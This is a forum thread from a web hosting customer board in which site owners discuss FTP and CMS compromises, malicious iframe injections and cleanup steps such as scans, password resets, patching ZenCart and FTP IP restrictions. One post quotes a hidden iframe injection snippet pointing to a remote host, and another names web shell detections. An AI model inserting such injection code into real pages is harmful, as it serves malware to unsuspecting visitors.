....

It apears my account was hacked again. Why doesn't powweb do something about this security hole... I had changed my password to an extreamly long length, reformatted my computer, have the latest antivirus.... not to mention I haven't logged into my account since the last incident occured.

I am extreamly close to chossing a different host.

I do know a solution and that is ONLY allowing certain IP addresses (mine) to log into the ftp!

even an email everytime someone (including me) logs into my account!!

Well you could disable FTP, in OPS, here, FTP (https://ops.powweb.com/webControl/FTP.bml), and then enable it for only as long as you need it.

Thanks but how does that prevent hackers from hacking my account and re-enabling the ftp?

Well it doesn't I guess. If both your OPS password and FTP password (which are different, right?) are continually compromised, you might as well go out and buy a paddle..

They are the same. didn't know they could be different?

I believe they are both the same by default (when an account is created), but they can both be changed to something different.

hmm thanks. I could try adding another user and making the password different but that would only help if the OPS was hacked. I'm still very unclear how my site was hacked. my computer? ftp? ops? powweb?

Ah, well my suggestion would only apply to making FTP access a bit more secure.

Posts up until this point were removed from a 5 month old thread.

Was it ever determined for sure that this was hacked with FTP? could it be some kind of script injection?

I'd echo entrecon's question. While there has been a recent spate of PC viruses that target webmasters to hijack FTP accounts, the vast majority of hacks are on websites running old versions of common blog, forum, gallery and other popular scripts with known vulnerabilities. But it is pretty rare for a hosting service to be hacked. Not unheard-of, certainly, but probably the last place you would check.

I usually advise the following steps for cleaning up and securing a hacked site:

Start by doing a virus scan of the computer that you use to create your website and upload the files to your site's server. This is to insure that you have removed any virus on your local computer that can be used to alter the files for your site or to steal your FTP account information. Most people already use anti-virus software as a matter of course, so it's a good idea to do this scan with software that you do not use on a regular basis so that you are protected against infections that your regular anti-virus program isn't able to find. There are several good free anti-virus or malware scanning programs available online. I recommend Spybot: Search & Destroy, or Malwarebytes' Anti-Malware. Either one will do a thorough scan of your computer and will remove any suspicious files.

Change the passwords on all of the FTP Accounts for the website. Hackers are increasingly targeting FTP account access information - user name and password - to spread their infections. Changing your password on a regular basis is also a good security practice in any case.

Delete all of the website's files from the server. The best way to remove an infection is to wipe the server clean, because hackers often add files to a site that either re-infects the webpages or opens a backdoor to the site for manual access. It's a good idea to use the website's Control Panel File Manager to delete the files because FTP programs do not always display hidden files or server control files (like .htaccess). The only files you can leave behind with relative safety are your mySQL database files, since they're almost always on a separate server and are rarely a source of malware. But if you have back-ups of your mySQL data files, you should consider restoring them from your back-ups, too, to make sure that no unauthorized administrator accounts have been created.

Restore the files for your website from your local back-ups. Of course, you need to make sure that your back-ups haven't been infected before you do this or you'll just be restoring the infection as well. Check for malware warnings at

www.google.com/safebrowsing/diagnostic?site=www.yoursite.com

to see which pages (if any) they may have marked as suspicious, and see if your local copies of those files are clean. It's also a good idea to check the last modification date on the local files to see if they appear to match the dates when you last updated them. If all is well, you can go ahead and restore the site.

Update all blog, forum, gallery, CMS, and other popular scripts to the latest version. Most hackers gain access to websites by exploiting known vulnerabilities in older versions. The people who make these scripts are usually very good at keeping up with hackers, but you need to watch for these updates and install them as soon as possible. Once you've updated the scripts on your website, be sure to update your local copy as well.

Good luck!

Solid advice and cool link rainbore. We need more info Chris_S to identify the cause. Are you running Wordpress and/or FileZilla? Update them if you do. There has been an iframe injection trojan plaguing Wp and Fz users for over six months. What antivirus do you use? Download, install, update and perform a "Quick Scan" with Malwarebytes (http://www.malwarebytes.org/) free version and report the findings here. I'd also consider installing a new antivirus if I were you.

Thanks for the advice rainbore. I don't currently have any ftp program installed and haven't accessed my site since the last hack but I was using FileZilla. I had a few simple php scripts but powweb techs said that wasn't the cause. I did not delete everything on the server but powweb removed the hacked code from my pages (using some sort of script?).

It's been awhile so I don't know the order for sure. After the last hack was sorted out I changed my password, reformatted my computer and purchased an antivirus. I was using AVG Free before.

My site uses an iframe.

and if i remember correctly the hack had something to do with an adobe reader exploit... but it's up to date.

I'm doing the Malwarebytes scan right now and so far no threats found.

unless I am missing something, Filezilla is an FTP program.

once your site is fixed, a link to it here might help? I am hesitant, but it would help people provide specific recommendations.

if ftp is the culprit, doing as snowmaker suggested in the initial reply to your question is the best solution. given how often you update your site, this does not seem like it will pose too much of an inconvenience for you.

Often by the time people discover these things it's to late to restore a backup from OPS. It's a really good idea to keep a local backup of your site. AVG Free is one of the better antivirus available. You didn't mention if you're running Wordpress. There was an exploit for some with with Acrobat 8 and Wp. http://wordpress.org/support/topic/281767 You could execute a script yourself to clean out the malicious iframe code. Make a backup of your legitimate iframe pages first.

Hi,

As far as I know I'm not using Wordpress. I don't know what it is.

The powweb techs have removed the code for the second time.

I don't see what's wrong with asking powweb to add a feature that blocks all ips except for mine from accessing the FTP and OPS.

If I had customers on my site I would have lost money due to this hack... My site could have been spreading viruses all over the net for the last 5+ months. If only I could be notified of access atemps...

I did not do anything with my site for so long becuase I really lost my motivation with my site do to the last hack.

Disabling the ftp still does not make my website feel secure. If the OPS is hacked they can re-enable it easily.

Why not send an email confirmation when ever you reactivate the ftp. That way even if the hackers had access to the OPS they would still need access to my email...

and how do you disable the FileManager in the OPS? I never use it and as far as I know that's what the hackers used. Disabling the ftp does not turn the FileManager off.

I think that an email confirmation when any changes made to the OPS could solve problems. Perhaps one could create a ftp 'session' that is activated by an email confirmation. Or at least an option to do it for those users that want the extra security. I mean forums send confirmations all the time when users signup to prevent spam...

The OPS passwords is very secure, and should be changed regularly. I very much doubt that that is the route they're using to get into your site (although I can't be 99.99999% certain).

Maybe if you post your domain name someone here could look to see what you're running, if you're not running Wordpress.

Any files you have on your account here are your responsibility. If someone complains about your site spreading a virus your account will probably be suspended. Little point in cleaning up files until you stop where they are getting in. %99.99999 of the time it's a outdated or poorly written script on your site. As Ian said, we can't help you without a link to your site.

email is down again. The site is slow. Too many problems.

I recommended Powweb to a few of our clients and they are now coming back to us complaining. we are losing business. This is bad for everybody!!!

I want to ask Powweb administrators to spend some money and buy some a bunch of powerful servers. It looks like they are taking too much business for their size and that's hurting all of us!

....

It apears my account was hacked again. Why doesn't powweb do something about this security hole... I had changed my password to an extreamly long length, reformatted my computer, have the latest antivirus.... not to mention I haven't logged into my account since the last incident occured.

I am extreamly close to chossing a different host.

I do know a solution and that is ONLY allowing certain IP addresses (mine) to log into the ftp!

even an email everytime someone (including me) logs into my account!!

Sorry if my posts seem a little *****y. I'm just getting frustrated and don't see any difference from last time. When the techs removed the code last time I did nothing to the files and left them like that on the server so if theres a hole somewhere in my site then that could explain the re-infection.

Once again, let me remind people that this is a customer to customer forum and that PowWeb staffers seldom stop by so ranting to them to change things is pretty much futile.

Also the choice to use a low cost shared host was yours and yours alone. You can always seek greener pastures. This comes as a customer not a moderator.

Hi Doc I totally agree with you. I know that the powweb staff don't regularly come here( I read the sticky or some post here mentioning that), I was mainly 'ranting' to see what otheres thought. I Understand powweb is not the most expensive host. I just thought some features could be very easy to implement, but what do I know. ;) I have used powweb for 3+ years and has been great other then some outages and the recent hacks. I'm still willing to stick with powweb but I'm getting second thoughts. I hope I can get this sorted out and feel more confident in powweb.

The hacks could deifintely be user error, i'm not discounting that. I'm open minded.

Dbrazzell was very helpfull the last time he fixed my site.

Chris_S, people here are willing to try and help, but you are not giving us information to do so...you've been asked three times to provide a link to your site so people could help you determine potential security issues. Why are you reluctant to do so? if you do not want to post the domain name in the forum, PM people who asked for it.

I had already sent it to the mods. I missed your request. Sorry.

There is absolutely no point in coming in here, asking for help and not provide enough info for us to help you. You havent told us your website address, so we cant see what scripts you are running. You havent even told us what scripts you are running.

The post containing an URL may have been one of the earlier posts that has been deleted, it's not that Chris_S won't help us help him. Chris_S, can you post it again, please?

he's asserted (via pm) that he does not want to post it here for fear of additional hacks. I've looked at the site briefly and it does not appear to be a CMS, but I'm not certain, and I havent looked around too much. what might be more helpful is a screenshot of the contents of htdocs?

If this has happened, twice, and support has fixed it, did they not clearly state what the method of entry was? If it is OPS, there is not much you can do other than change your password regularly and ensure your computer is not infected with something. maintaining a website takes work, even if you do not update content often.

I agree with the pm thing. In fact, after I posted earlier that dawned on me..

I also received a PM and looking around the site it looks as if it's HTML based with java/javascript embedded rather than a CMS standard script.

Thanks for your replies and sorry the confusion. I'm just being paranoid. If anyone wants to take a look at my site just PM and I will send it to you. I do appreciate your help. Thanks.

Both times the techs said it was an FTP hack. The more I think of it it's very possible the hacker snuck in while I was attemting to reformat and install windows.

My site usses a lot of Javascript and CSS. No CMS. Croc Hunter says my code has fundamental errors. Before the first hack I had most of my pages validate correctly at http://validator.w3.org/ however I did not finish as I got hacked and didn't touch my site since.

I took a look at the htdocs and all I have are css,html and js files. I was experementing with a binaryajax script to get image properties from an image file.

Is FileZilla safe to use now, or should I use a different FTP program?

Here is the previous thread for more info on the first hack.
http://forums.powweb.com/showthread.php?t=82104

I've used FZ for a long time without a problem, but they do update for bugs and holes. Instead of getting FZ to remember your password, set it so you have to type it in each time.

Well you could disable FTP, in OPS, here, FTP (https://ops.powweb.com/webControl/FTP.bml), and then enable it for only as long as you need it.

this was in post #2! This will simply not allow anyone to use FTP outside of those times you have it enabled to do updates. You can use a different FTP program if you want, but I'm not sure how much of a difference it will make.

Put your paranoia aside for a week Chris, I will vouch for anyone of these guys who've posted on your thread. Your javascript is old school at a glance via browser, it's to late to check your logs. Loose permissions on your js files etc could be the "fundamental" problem along with outdated code. I or one of these guys would need FTP access to check that (do not post logins here on the forum). Static iframes are not a good idea and your site could be replicated without them. I'm busier than a one legged man in an arse kickin' contest at the moment. Post your domain so these good folk can help you.

Alright here is my site just remove the ^s
in^spired^visuals.c^om

Hmm with regards to the javascript what do you mean by loose permissions? It's possible the code is outdated. What I did was search the web for tutorials and scripts that I wanted for my site and used the code from there after modifying it for my purposes. Seemed to work fine. The front page index.html is out dated its 4 years old. I was working on getting the other pages perfected and cleaned up first and I haven't had the chance to get to the main page yet.

I have been told many times to not use iframes but I could not find an alternative. There are alternatives but not quite what I need. I need to load pages within the iframe and I don't think a css element can do that? If you can tell me that's the a security hole I guess I will have to redesign my site. hmm

might be time for a new thread...

I'm not sure how what the iframe does is better than just putting that code directly into the page. more explanation of what you are tring to accomplish is needed. iframes are usually good for having content from another site embedded in yours. I'm not sure why one is needed to have content you created in your site...please explain.

ALSO, back on topic, if ftp was the source of intrusion, I dont think the iframe is the problem. Also, while I only looked at a couple of pages, I didnt see any js files referenced. you can view permissions for them in the filemanager via OPS - simply post what they are here...should be 644 if I recall?

I just checked and the permissions are set to 644 for .js and .css files and 755 for .html files. Some .jpgs are 755 and some are 644. I Don't know why they are different.

When designing my website years ago I had reasons for using iframes but that was a long time ago so I don't remember what was going through my head. ;) I will try to explain.

- I don't like how most sites have the entire window 'refresh' whenever a user clicks a link in a menu.
- I like to have control over the individual pages for each image and gallery section.
- If I didn't use iframes then I would have one huge page with everything hidden. Then use css/js to unhide and display the images and text. or I would have many pages that would include the same main menu and that doesn't seem very efficient. My logic may be flawed. Don't know a whole lot on scripting.
- Requires less scripting to create the effect I want.

It really doesn't matter the reasons as i'm willing to consider alternatives just as long as it creates the same effect that's already on the site.

644 is fine for all .js, .css and .html files. 755 is fine for directories. .js files could be fine with permission down to 600. PHP included files, and .php files themselves will mostly work fine at 600. A PHP included directory could be down to 700. Just remember, every file/directory shouldn't have more permissions than it needs to be run, IOW (In Other Words), don't set anything any higher than 644/files, 755/directories. If a script needs higher permissions to be run correctly, scrap it.

The way a webpage 'acts' because of iframes, can be almost always, and probably be better duplicated with PHP includes.

sounds like you want ajax, which does require more scripting - although I have no real idea because I only know how it works in theory...i'd call iframes a shortcut - with all the potential issues.

I wonder if using iframes to call content from your own site has the same security risks as using it to get content from somewhere else?

Yea this is becoming a bit more complicated then I hoped. Can someone tell me how exactly hackers use iframes. From what I read it was hackers creating sites using iframes to hack search engine results and had nothing to do with hackers hacking a legitimate site that uses iframes. I did play around with php scripts and it seemed a lot slower. Browser side scripting I would rather stick with.

The only issues I see(with my limited knowledge) with iframes are that search engines don't search the pages within iframes and that it's no longer a W3C standard.

snowmaker thanks for the tips. I will do some reseach on file permissions.

To give you more of an idea how PHP includes can be used, see any of the sites in my sig. There's basically one file, index.php, that includes a text file to make up a page based on the link clicked.

Thanks. That's the right idea. Is there anyway to get rid of the entire page 'flicker' in ie? firefox I don't see it though. or use php to load a page with in an element so the entire page doesn't have to reload?

I wasn't aware of any flicker-type issues with any of my sites, in any browser that they do work in, I'll have to take a look at that. PHP and CSS can be used well together. See here, 22 Resources to Easily Create CSS Layouts | Vandelay Design Blog (http://vandelaydesign.com/blog/design/css-layout-tools/)

You don't need to use php for AJAX like pages.
You can just load the static pages via JS and display them in a <div>.

I don't think the iframes are the way the hackers are hacking sites, it is just that they insert an iframe with a link to malware.

I've had several old clients contact me complaining of this lately. 9/10 infected sites are running out of date applications like Wordpress, Zencart, Movable Type and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.

You have to update the applications and reset every database, FTP, OPS account, etc passwords. Then cleanup all other infected files and don't let anyone login until they've run Malwarebytes.

I searched and searched for a script to strip out the <div style="display:none">blahcrapolablah<iframe width=436 height=773 src="http://russian-crap.ru:1234/index.php" ></iframe></div><div style="display:none">

How hard would a cleanup script be to write? I tried a few times but it's a bit beyond me. Can someone write it? I would pay. Some of these guys have hundreds of thousands of files and of course.. no backups.

and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.

I think that's what happened but instead of inserting iframe code an unescape javascript function was inserted into every page.

If no one else has anthing to add I will delete everything off the server and refresh it from the back ups.

Thanks again for the help.

This is my first experience having my website "hacked", or invaded. Isn't there a law against this? I thought I was safe.

On 9/1/2009 at 3:10 into 3:11 every one of the several hundred html files on my site was modified. This "Iframe" tag was added to EVERY html file.

<<iframe details removed>>

This attack dug deep into every directory and subdirectory, and did not miss one html file (and it covered index.php files too.)

I don't know exactly what this "IFRAME" tag is supposed to do, or how it does it, this is all very new to me, but apparently this simple addition will result in malware being loaded onto a visitor's computer. As a result, Google diagnostics has labeled my site "suspicious."

(Can someone please explain how this "Iframe" tag can cause malware to be downloaded to my visitor's computer? How is that possible?)

I did not discover the issue until today. And I immediately spent about 4 hours uploading clear copies of every HTML file. (I had other plans for my time, I can assure you).

I want to know if this has happened to anyone else on powweb recently. Is this a system or a network issue? Or was my site singled out for this treatment?

And I want to know how in the world this could have happened. I thought I was the only one who could modify files on my site. But here, several hundred HTML files were modified without my consent or knowledge. Every html file on the site. Did not miss one of them. Several hundred.

Can someone PLEASE give me an idea of where to start looking to try to understand how this happened, so hopefully I can do something that will make sure it will never happen again?

Sincerely,
GoldenEagles

Hacking mostly occurs due to old versions of CMS's like wordpress etc.

Please remove the offending URL from your post. :)

It's a trojan keystroke recorder. I've had to cleanup several accounts here and at another host. I wish someone clever would write a little script to strip out the <iframe>*</iframe> infection.

Here's a quick what to do guide.
1. Install update and scan your PC with Malwarebytes
2. Update and scan your PC/Mac with your antivirus
3. Restore the oldest site backup from in OPS or your own clean backup.
4. Download the latest version of any application like WordPress, ZenCart, Gallery etc you use. Upload it overwriting the existing files. Also upgrade your local applications like FileZilla.
5. Go through and manually remove the iframe code from ALL index home and default files account wide (even files like default-widgets or home2). Don't forget plugins, themes, forum pages etc. (while slow it's safe to do this via OPS FileManager).
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.
7. Once you are positive you are clean create a backup!
8. Wait 24hrs. If you do not get re-infected request a review of your site through Google webmaster tools.

Responding to Halfabee first,

I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistenly, a few times week.

Perhaps these things are akin to some of what you are referring to?

Is there any way to pin down, with a high degree of certainty, whether either of these two avenues were used as the attack path?

p.s. I zipped both installations, and deleted the active folders last night. O yes, and I found three files in my cgi-bin that I know I did not put there. I deleted them too.

It's a trojan keystroke recorder.

Please explain what is this trojan keystroke recorder? and how that would relate to an attack like this? According to the date and time stamps of the corrupted files, several hundred files were modified in about one minute. That is, several hundred append actions were accomplished in about one minute, That is, the rogue "Iframe" tag set was appended to several hundred html files in about one minute.

You'd be best to Google it. Once they get access they execute a script to find any index etc and insert the code. It only takes a minute or two. All but one of the accounts I've cleaned so far had out of date ZenCarts. Follow the steps I posted.

Most these iframes that get inserted into the sites send visitors over to another third party site that sitting waiting to give you the latest drive by download which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phising schemes.

Its really all up to whos running the third party site and what they are feeling like pushing that day.

Its setup so they only have to infect your site once with the malicious iframe. But they can change what visitors are infected with at any time they feel like it.

I have seen the SEO spamming stuff that someone earlier mentioned. That seems to be a lot rarer.

What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to it's security upkeep?

What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to it's security upkeep?

As noted above, in response to halfabee:

I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistenly, a few times week.

I archived both installations, and deleted the active folders, and just to be safe, I transferred the zipped archives to my local machine. My site is now script free. I think I have closed all the doors.

Any further ideas that you might have, I would like to hear.

Most these iframes that get inserted into the sites send visitors over to another third party site that sitting waiting to give you the latest drive by download which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phising schemes.

I would like to know how this could be done so easily. Does malware strategy depend on security holes in the browser, and if so, which browser is most vulnerable? And why are these holes not plugged?

Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser? Isn't that right?

Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser?

Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search (http://www.google.com/search?q=why+is+activex+dangerous)

Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search (http://www.google.com/search?q=why+is+activex+dangerous)

I did that search on Google, and I see that the most recent reference to this issue is more than three years old. For that reason, I am concluding that ActiveX controls do not seem to be an issue of high security concern when it comes to majority of avenues used to infect PC's with malware. And I suppose this is especially true because their download is signaled, and the user can choose to reject the download.

From what I understand, the issue that we are dealing with here, are ways to get around download detection routines in the browser, where these malicious programs end up on the person's computer, and running on the person's computer, without the user having any idea that anything at all has been downloaded. Isn't that right?

And I would ask the question again, why aren't these security holes closed? Or perhaps they are closed, but some users don't update their browser to the latest release? Or perhaps, if one hole is closed, that patch itself has a hole in it that the hackers find and exploit. I wonder if someone could give a definitive answer on this point.

I wanted to give an update on my search for the path that this hacker may have exploited into my website.

As I noted above, I zipped my outdated installation of both Zen Cart and PhpBB3. And I downloaded those archives to my local computer. And I deleted both the zipped archives, and the installation folders for these applications from my website.

Locally, I ran an Avira scan on these two zipped archives.

The phpbb3 archive did not show anything but a few of the iframe infections that I had missed when I first uploaded clean html files into every directory.

However, the Zen Cart archive showed the following infections:

--> Zen_Cart_Installation/images/juno-user
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Katien.R back-door program
--> Zen_Cart__Installation/images/ycplia.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
--> Zen_Cart__Installation/images/fdqthz.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus

I think it is fair to conclude from this, that it is highly probable that the attack on my website came through the Zen Cart installation, which as I noted, had never been used, had never been rolled out for public use, nor had it been updated with any security patches for one year.

When I visited the Zen Cart website a few days ago to look at what security issues had come up during that time period, I found a few that were very serious, and they discussed them openly, and they immediately issued patches. For Zen Cart operators who are paying attention, they could be relatively safe, if they installed the patches immediately. However, their openness in this regard, also gives the hackers exactly the information they need to exploit those zen cart installations where the patches are not installed (like mine). In this regard, I saw a distinct difference in the PHPBB3 approach to security. On the PHPBB3 site, there were no open discussions concerning the details of sercurity issues. Users could report security issues to their security center, but those posts were kept private, and there were no public forums detailing the precise security issues that had come up. This was an obvious choice on their part, as such information can be used by the hackers too as noted.

I would just note from this, that one thing we might learn from this, is that Zen Cart operators should be very careful about following the security issues on the Zen Cart website (as the hackers are obviously following their announcements), and when patches are provided, that these should be implemented immediately. Zen Cart operators should have this goal in mind, that the patches be implemented faster than the hackers can find an unguarded Zen Cart.

I can imagine this, that these hackers have robots combing the web for the presence of Zen Cart installations, and the very minute a security issue is brought forward on the Zen Cart site, they can tell their robot where to look for the newest vulnerability. In support of this thesis, I note that my website is crawled by dozens of robots every day. What are they looking for? Moreover, as I mentioned above, I had seen in my website access logs repeated accesses to the zen cart installation, which was inexlicable to me at the time because I was not aware that I had told anyone that it was there. I did not know what to make of this at the time. These hackers might send their robots out looking for many other kinds of cgi/php installations, but for zen cart, this looks rather easy to exploit given their openness in laying bare the details of the holes found in their security. This is not a criticism of them on this point however. Their openness in this regard is largely due, I think, to the fact that the implemention of security patches in Zen Cart, requires the user to manually modify php code in one or more files. And so, the file names and code have to be laid bare for all users so that the "patches" can be implemented.

This is far different from Windows Update for example, where updates are downloaded, and automatically installed, without anyone seeing the nature of the fix that is being implemented.

From my short visit to the PHBBB3 website, I get the sense that PHPBB3 also uses this modular updating approach, where the public does not see the details of the code that is being modified when they issue a security patch, that it is done more or less automatically.

hi there!!

Ho will i know that my account or site is being hacked? I am suspecting something's bad happening to my site

One way to check your site is to use Google's Safebrowsing diagnostic tool. Just enter

http://www.google.com/safebrowsing/diagnostic?site=www.yoursite.com

Just replace "www.yoursite.com" with your own domain name. This tool will show you if any of Stopbadware's partners have reported your site as being suspicious. Another good online tool is Unmask Parasites (http://www.unmaskparasites.com/) which scans webpages for common hacks in real time. If you know HTML, there's a new tool in the Google Webmaster Tools console under "Labs" that will show you what Googlebot sees when it fetches pages from your site. Some hacks only reveal themselves to Googlebot, so this can be useful. Another good idea is to do a simple "site:" search in Google to see if Google has indexed anything that you don't recognize as your own.

You can also use the Powweb File Manager or whatever FTP program you use to check the modification dates on all of the files on your site. If the dates on the site don't match the dates when you last uploaded the files or if the file sizes don't match, it's a sign of trouble.

There's some very good information available at stopbadware.org's Tips for Cleaning and Securing Your Website (http://www.stopbadware.org/home/security).

Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC, and every webmaster should be sure to use such software to prevent their website account information from being stolen. This is becoming a more common issue, although it still is not how the majority of sites get hacked. But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

If you run any blog, forum, gallery, CMS, shopping cart or other common script, you should make it a part of your routine site maintenance to check to make sure that you are running the latest version. By far the most common means by which hackers gain access to a site is through known vulnerabilities in older versions of popular scripts. Since many scripts promote themselves automatically on every page they generate, often all that a hacker has to do to locate a vulnerable site is to do a Google search for the software name and the version number, so don't think that just because your site isn't that popular or that you don't do much with these scripts that you are safer.

Rainbore, that was all together a good and informative post. However, I would address this particular point ....


Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC .... But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

After recognizing the hack attack on my website which inserted a rogue iframe tag in every html page, and index.php pages, hundreds of pages all together, I replaced all the html pages with clean pages. Because of the complexity of the file structure I did not do this for my Zen Cart installation. For this, I zipped the whole installation, and then downloaded the archive to my PC. I then ran an Avira scan on that zipped archive, and Avira found every rogue Iframe, and it also found three additional trojans scripts, the purpose of which I am assuming, was to give the hacker direct access to my website.

Therefore, I must observe, that your statement quoted above, "that these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good ..." Seems to be too broad of a generalization. It may be true that some anti-virus packages may not be useful in this regard. But Avira seemed to do an excellent job in the situation I just described.

I disgree GoldenEagle, rainbore's advice is entirely accurate. Most people have never even heard of Avira. It's not in the current top ten most popular antivirus. Big brand names like Norton and PC-Cillin don't even rank, that puts you in the minority. The lucky minority at that in this case.

I pretty much told you it was Zencart back on post #51 ~smack~ Look in your antivirus vault, name the 3 rogue files you found and where exactly you found them. It will help others here and I'd like to research them further. It is more than likely your Zencart database is corrupt so delete "drop" it if you can along with any other unused databases. Then check all user tables of remaining databases for suspect entries.

6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.


What do you mean by reflect your changes in the config files?

Most people have never even heard of Avira. It's not in the current top ten most popular antivirus.

Since 2004, Av-Comparatives.Org has run comprehensive tests on a variety of anti-virus products. They have included Avira in the tests since 2006.

avast! Professional Edition 4.8
AVG Anti-Virus 8.5
AVIRA AntiVir Premium 9
BitDefender Antivirus 2010
eScan Anti-Virus 10
ESET NOD32 Anti-Virus 4.0
F-Secure Anti-Virus 2010
G DATA AntiVirus 2010
Kaspersky Anti-Virus 2010
Kingsoft Antivirus 2009
McAfee VirusScan Plus 2009
Microsoft Live OneCare 2.5
Norman Antivirus & Anti-Spyware 7.10
Sophos Anti-Virus 7.6
Symantec Norton Anti-Virus 2010
TrustPort Antivirus 2009

Avira not only had the overall highest detection rate, but Avira had
the highest detection rate in each of the test categories.

Windows Viruses
Macro viruses
Script Malware
Worms
Backdoors/Bots
Trojans
other malware

I hope this information update will be helpful to you.

Try rhis .ftpaccess to limit FTP access through your IP only. Try this not sure will work
upload the file to root. enter your IP instead of w.x.y.z!!!!
<Limit ALL>
DenyAll
Allow w.x.y.z
</Limit>

Try this .ftpaccess to limit FTP access through your IP only. Try this not sure will work..

It does. For me anyway.. I'm quite sure it'll work for everybody else too..

Another good tool to use is the website secunia.org. They have a page http://secunia.com/advisories/product/ that will list known vulnerabilities for a vast amount of applications including zencart, phpbb, etc.

A few additional things that should trigger anybody to be cautious and check their account for signs of unauthorized activity:
- sudden large number of unfamiliar email bouncebacks
- sudden large increase in site traffic seen through visitor stats without a marketing campaign
- A file in your account executes code that has been obfuscated

Obfuscation is usually done through base64 encoding / decoding but may also be done through character switching, character arrays, and many other methods.

Please feel free to contact support if you suspect a file in your account has been hacked and need help.